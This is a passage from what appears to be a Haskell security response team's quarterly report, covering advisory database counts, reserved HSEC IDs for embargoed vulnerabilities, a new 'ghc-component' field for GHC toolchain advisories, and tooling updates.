[YouTube channel] at some point. 70 | 71 | [CrikeyCon]: https://crikeycon.com/ 72 | [slide deck]: https://speakerdeck.com/frasertweedale/security-response-for-open-source-ecosystems 73 | [YouTube channel]: https://www.youtube.com/@CrikeyCon 74 | 75 | 76 | ## Advisory database 77 | 78 | 3 contemporary advisories were published during the reporting period. 79 | 80 | 2 historical advisories were added during the reporting period. 81 | 82 | 2 HSEC IDs (HSEC-2024-0004 and HSEC-2024-0005) **remain** reserved 83 | for embargoed vulnerabilities, which will be published later. 84 | 85 | We ask community members to report any known security issues, 86 | including historical issues, that are not yet included. 87 | 88 | 89 | ## Advisories for the GHC toolchain 90 | 91 | Following preparatory work last year, 2025-Q1 saw the publication of 92 | the first advisories for components of the GHC toolchain itself. To 93 | declare a GHC component as affected in an advisory, set the 94 | `ghc-component` field (cf. `package` for the Hackage namespace): 95 | 96 | ``` 97 | [[affected]] 98 | ghc-component = "ghc" 99 | ``` 100 | 101 | The valid `ghc-component` values are: `ghc`, `ghci`, `rts`, 102 | `ghc-pkg`, `runghc`, `ghc-iserv`, `hp2ps`, `hpc`, `hsc2hs`, and 103 | `haddock`. 104 | 105 | We registered the `GHC` namespace in the OSV schema. Advisories can 106 | be browsed on OSV.dev: https://osv.dev/list?q=&ecosystem=GHC. 107 | 108 | 109 | ## Tooling updates 110 | 111 | - Gautier updated our tooling to build with GHC 9.10 and 9.12 112 | support. This involved switching our Atom feed generation from 113 | the unmaintained *feed* library to *atom-conduit*. 114 | --------------------------------------------------------------------------------